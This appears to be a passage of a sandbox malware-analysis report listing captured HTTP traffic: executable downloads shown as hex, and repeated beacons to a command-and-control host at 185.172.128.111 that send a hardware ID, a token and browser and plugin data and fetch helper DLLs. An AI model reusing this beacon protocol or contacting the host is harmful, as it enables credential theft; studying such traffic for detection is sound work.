0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 07:41:11 GMTContent-Type: application/x-msdos-programContent-Length: 2046288Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 07:41:12 GMTContent-Type: application/x-msdos-programContent-Length: 257872Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 07:41:13 GMTContent-Type: application/x-msdos-programContent-Length: 80880Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Apr 2024 07:41:39 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 24 Apr 2024 21:15:46 GMTETag: "85400-616de2c892480"Accept-Ranges: bytesContent-Length: 545792Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 63 08 c4 c7 27 69 aa 94 27 69 aa 94 27 69 aa 94 93 f5 5b 94 37 69 aa 94 93 f5 59 94 a0 69 aa 94 93 f5 58 94 38 69 aa 94 1c 37 a9 95 33 69 aa 94 1c 37 af 95 14 69 aa 94 1c 37 ae 95 05 69 aa 94 2e 11 39 94 22 69 aa 94 27 69 ab 94 7d 69 aa 94 8d 37 a3 95 25 69 aa 94 8d 37 55 94 26 69 aa 94 27 69 3d 94 26 69 aa 94 8d 37 a8 95 26 69 aa 94 52 69 63 68 27 69 aa 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 76 29 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 b0 06 00 00 b4 01 00 00 00 00 00 b6 80 05 00 00 10 00 00 00 c0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 08 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 9c 07 00 28 00 00 00 00 f0 07 00 40 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 6c 80 00 00 b0 80 07 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 81 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 31 af 06 00 00 10 00 00 00 b0 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 aa e2 00 00 00 c0 06 00 00 e4 00 00 00 b4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 20 00 00 00 b0 07 00 00 0e 00 00 00 98 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 f8 01 00 00 00 e0 07 00 00 02 00 00 00 a6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 40 28 00 00 00 f0 07 00 00 2a 00 00 00 a8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 6c 80 00 00 00 20 08 00 00 82 00 00 00 d2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHJECAAAFHIJKFIJEGCHost: 185.172.128.111Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 35 41 35 34 35 39 44 37 46 36 45 32 33 37 31 35 34 33 35 31 30 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 2d 2d 0d 0a Data Ascii: ------BFHJECAAAFHIJKFIJEGCContent-Disposition: form-data; name="hwid"D5A5459D7F6E2371543510------BFHJECAAAFHIJKFIJEGCContent-Disposition: form-data; name="build"default10------BFHJECAAAFHIJKFIJEGC--
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCFHDAKECFIDGDGDBKJDHost: 185.172.128.111Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 46 48 44 41 4b 45 43 46 49 44 47 44 47 44 42 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 62 35 61 62 31 65 35 62 32 33 35 31 38 33 33 32 36 39 30 64 66 38 36 31 63 62 30 33 38 39 39 33 39 33 64 63 66 65 39 35 39 37 64 30 31 65 62 35 38 34 39 30 39 35 65 39 37 62 38 39 61 61 62 39 34 66 66 63 35 31 0d 0a 2d 2d 2d 2d 2d 2d 47 43 46 48 44 41 4b 45 43 46 49 44 47 44 47 44 42 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 43 46 48 44 41 4b 45 43 46 49 44 47 44 47 44 42 4b 4a 44 2d 2d 0d 0a Data Ascii: ------GCFHDAKECFIDGDGDBKJDContent-Disposition: form-data; name="token"61b5ab1e5b23518332690df861cb03899393dcfe9597d01eb5849095e97b89aab94ffc51------GCFHDAKECFIDGDGDBKJDContent-Disposition: form-data; name="message"browsers------GCFHDAKECFIDGDGDBKJD--
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJDAFIEHIEGDHIDGDGHHost: 185.172.128.111Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 62 35 61 62 31 65 35 62 32 33 35 31 38 33 33 32 36 39 30 64 66 38 36 31 63 62 30 33 38 39 39 33 39 33 64 63 66 65 39 35 39 37 64 30 31 65 62 35 38 34 39 30 39 35 65 39 37 62 38 39 61 61 62 39 34 66 66 63 35 31 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 2d 2d 0d 0a Data Ascii: ------DHJDAFIEHIEGDHIDGDGHContent-Disposition: form-data; name="token"61b5ab1e5b23518332690df861cb03899393dcfe9597d01eb5849095e97b89aab94ffc51------DHJDAFIEHIEGDHIDGDGHContent-Disposition: form-data; name="message"plugins------DHJDAFIEHIEGDHIDGDGH--
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAAFBFBAAKECFIEBFIECHost: 185.172.128.111Content-Length: 8043Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8e6d9db21fb63946/sqlite3.dll HTTP/1.1Host: 185.172.128.111Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBKFBFCGIEHIDGCFBFBHost: 185.172.128.111Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJJJDHDGDAAKECAKJDAHost: 185.172.128.111Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIDAAFBGDBKJJJKFIIIJHost: 185.172.128.111Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 62 35 61 62 31 65 35 62 32 33 35 31 38 33 33 32 36 39 30 64 66 38 36 31 63 62 30 33 38 39 39 33 39 33 64 63 66 65 39 35 39 37 64 30 31 65 62 35 38 34 39 30 39 35 65 39 37 62 38 39 61 61 62 39 34 66 66 63 35 31 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 4f 44 52 6e 4f 47 56 79 5a 33 49 75 5a 6d 6c 73 5a 51 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 2d 2d 0d 0a Data Ascii: ------IIDAAFBGDBKJJJKFIIIJContent-Disposition: form-data; name="token"61b5ab1e5b23518332690df861cb03899393dcfe9597d01eb5849095e97b89aab94ffc51------IIDAAFBGDBKJJJKFIIIJContent-Disposition: form-data; name="file_name"ODRnOGVyZ3IuZmlsZQ==------IIDAAFBGDBKJJJKFIIIJContent-Disposition: form-data; name="file"------IIDAAFBGDBKJJJKFIIIJ--
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJDAFIEHIEGDHIDGDGHHost: 185.172.128.111Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 62 35 61 62 31 65 35 62 32 33 35 31 38 33 33 32 36 39 30 64 66 38 36 31 63 62 30 33 38 39 39 33 39 33 64 63 66 65 39 35 39 37 64 30 31 65 62 35 38 34 39 30 39 35 65 39 37 62 38 39 61 61 62 39 34 66 66 63 35 31 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 4f 44 52 6e 4f 47 56 79 5a 33 49 75 5a 6d 6c 73 5a 51 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 2d 2d 0d 0a Data Ascii: ------DHJDAFIEHIEGDHIDGDGHContent-Disposition: form-data; name="token"61b5ab1e5b23518332690df861cb03899393dcfe9597d01eb5849095e97b89aab94ffc51------DHJDAFIEHIEGDHIDGDGHContent-Disposition: form-data; name="file_name"ODRnOGVyZ3IuZmlsZQ==------DHJDAFIEHIEGDHIDGDGHContent-Disposition: form-data; name="file"------DHJDAFIEHIEGDHIDGDGH--
Source: global traffic HTTP traffic detected: GET /8e6d9db21fb63946/freebl3.dll HTTP/1.1Host: 185.172.128.111Cache-Control: no-cache
